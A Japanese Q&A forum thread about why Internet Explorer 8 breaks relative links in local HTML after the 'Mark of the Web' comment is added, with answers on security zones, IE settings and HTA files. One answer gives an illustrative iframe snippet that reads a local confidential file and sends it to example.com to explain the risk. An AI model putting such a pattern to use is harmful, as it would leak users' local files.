• 締切済み

ローカルHTMLでセキュリティブロック解除

環境 internet explorer8 windows xp sp3 ローカルでHTMLを作成しております。 起動時に毎回セキュリティ保護のため~という警告?がでますので、以下を<HEAD>に入力し出さないようにしました。 <!-- saved from url=(0014)about:internet --> 警告は出なくなったのですが、今度は相対パスで指定したファイルのリンクがつながらなくなりました。 (例) <a href="data/pdf/test.pdf">ここをクリック</a> 対処法などありましたら教えて頂きたく。

  • HTML
  • 回答数6
  • ありがとう数6

みんなの回答

  • dscripty
  • ベストアンサー率51% (166/325)
回答No.6

あらら、ちょっとはしょりすぎたみたい。 | うーん・・・こちらの意図が伝わってなかったようですね。 | 今回作成したものは、ネットに公開しません。 引用ページをかみくだいて、今回のケースにあてはめて説明するね。 IE(一般的なウェブブラウザもそうだけど)は、セキュリティーゾーンといういくつかの、区域に分けてそれぞれがセキュリティー上支障がないように、ぞれぞれの区域ごとに許可レベルを設定して安心して IE を使えるようにしてあるんだけど、 ローカルゾーンであるはずの PC 上の HTML ファイルを、質問者さんは、みずから、インターネットゾーンに変えてしまっているわけだから、 IE はそのファイルを『ローカル』じゃなくて、『インターネットで信頼できるかわからない』ファイルとして、あつかっているわけ、 説明は不要だとおもうけど、いちおう書いておくね。 もし、『インターネットで信頼できるかわからない』ページに、ローカルファイルへのアクセスを許したらどうなるかというと、 例えば、http://example.com/index.html というファイルがあって、 | <iframe | onload="location.href='http://example.com/collect-data.php?data=' & encodeURI( | this.contentWindow……<省略>);" | src="file:///C:/Documents and Settings/Administrator/デスクトップ/社内秘.txt"></iframe> ↑のように書かれていたとき、↓にアクセスするだけで、 http://example.com/index.html ↓が example.com サーバへおくられちゃうということ。 file:///C:/Documents and Settings/Administrator/デスクトップ/社内秘.txt これで、「<!--saved from url=(0014)about:internet -->」のあきらめついた?

すると、全ての回答が全文表示されます。
  • dscripty
  • ベストアンサー率51% (166/325)
回答No.5

インターネット上のウェブページがローカルにあるファイルにアクセスできちゃったら、情報漏洩させられまくりだよ? http://technet.microsoft.com/ja-jp/library/cc782928(v=ws.10).aspx ----引用---- Web ページを常にインターネット ゾーンの一部として処理する場合 は、次の Web のマークを使用するこ とができます。 <!--saved from url=(0014)about:internet --> このコメントを使用するのは、Web のマークを一般的に挿入する場合で す。about:internet の部分は、この ページをインターネット ゾーンに入 れることを示します。 ----引用おわり----

mikanbako00
質問者

お礼

うーん・・・こちらの意図が伝わってなかったようですね。 今回作成したものは、ネットに公開しません。 あくまで、ローカルで使用する為に作っております。 そもそも、ネットに公開(サーバーにアップ)した場合、今回のようなセキュリティの保護云々の警告は出ませんので(出にくい?)・・・ (少なくとも今回作っているものは出ません確認済みです) なぜか、IEはローカルのほうがセキュリティ設定が厳しいんですよね。 なんとかならんかなー

すると、全ての回答が全文表示されます。
  • dscripty
  • ベストアンサー率51% (166/325)
回答No.4

そういうことなら、解決策は、下のどちらかかな? 1) script タグを使わない。 2) html 内のスクリプトを完全に信用して .hta(※ HTML Application) を使う。 (※ HTML Application) http://msdn.microsoft.com/ja-jp/library/ms536496%28v=vs.85%29.aspx http://en.wikipedia.org/wiki/HTML_Application

mikanbako00
質問者

お礼

実はHTAも作成したことがあるんです。 リンクが必ず別ウィンドウで立ち上がる、リンクを開いた時に警告ウィンドウが出るなど色々問題点がありましたが、一応クリアできております。 が、ちょっと上記とは別エラーで使い物にならず(ここでのエラーは割愛させて頂きます、質問の主旨が変わってしまいますので)他の方法を探しておりました。 とりあえず、なぜ質問の方法でリンクが使えないのか等原因を教えて頂けると諦めが付きます。

すると、全ての回答が全文表示されます。
  • dscripty
  • ベストアンサー率51% (166/325)
回答No.3

セキュリティーに疎いなら、 [ANo.2] さんの回答のように設定にした PC ではインターネットからウェブページのダウンロード保存はしないようにね! これも、セキュリティーに疎いなら、おすすめできないけど 『PC にウェブサーバをインストールする』 おすすめは、 『誰かにウェブサーバを作ってもらってそれを使わせてもらう』が楽でいいね。

mikanbako00
質問者

お礼

回答ありがとうございます。 今回はローカルでHTMLを作成・利用するということで、ウェブサーバーの構築または利用しないという条件です。

すると、全ての回答が全文表示されます。
  • mikemike7
  • ベストアンサー率87% (97/111)
回答No.2

とりあえず <!-- saved from url=(0014)about:internet --> を消しましょう。 IEのツール→インターネットオプション→詳細設定タブ と移動して、セキュリティの項目にある マイコンピュータのファイルでのアクティブ コンテンツの実行を許可する にチェックを入れれば警告はでなくなるかもしれません。

mikanbako00
質問者

お礼

すみません。説明不足でした。 IEの設定で警告を出さなく出来るかもしれないというのは知っていましたが、その方法は取りたくなく、今回のような苦肉の策をやりました。 回答ありがとうございます。

mikanbako00
質問者

補足

他にはHTAに変換という手もあるみたいですが、できればHTMLのまま利用したいと思っております。

すると、全ての回答が全文表示されます。
  • 0909union
  • ベストアンサー率39% (325/818)
回答No.1

>saved from url=(0014)about:internet --> ????? 何だこりゃ・・・・・ IEだと(?)思うが、アプリのエンコードなしの保存ファイルと思われる。 >今度は相対パスで指 あたりまですよね。そのアプリ独自のフォーマットで保存されるので。Filesなどのフォルダーに保存されると(他の意味のあるメタデーターを良く見ること)、そのパスが必要です。 一度、IEなどの「名前をつけて保存」で、ソースコードを研究してください(2、3分で分かると思うよ)。

mikanbako00
質問者

お礼

回答ありがとうございます。 <!-- saved from url=(0014)about:internet --> ↑これはMark of the Webというものです。 参考(MSDN)・・・http://msdn.microsoft.com/en-us/library/ms537628(VS.85).aspx まぁ、これを使うのがベストかの判断は私には出来ませんが、探して見つかった方法がこれでしたので・・・ IEなどの名前をつけて保存?てのはよく分からなかったです。 Webページのソースを見るときはいつも表示→ソースを使っておりますので(こういうことじゃないのかな?)

すると、全ての回答が全文表示されます。
  1. カテゴリ
  2. [技術者向] コンピューター
  3. プログラミング・開発
  4. HTML

関連するQ&A

注目のQ&A

カテゴリ

OKWAVE コラム

あなたにピッタリな商品が見つかる! OKWAVE セレクト

専門家に質問してみよう

職業から探して質問する
質問する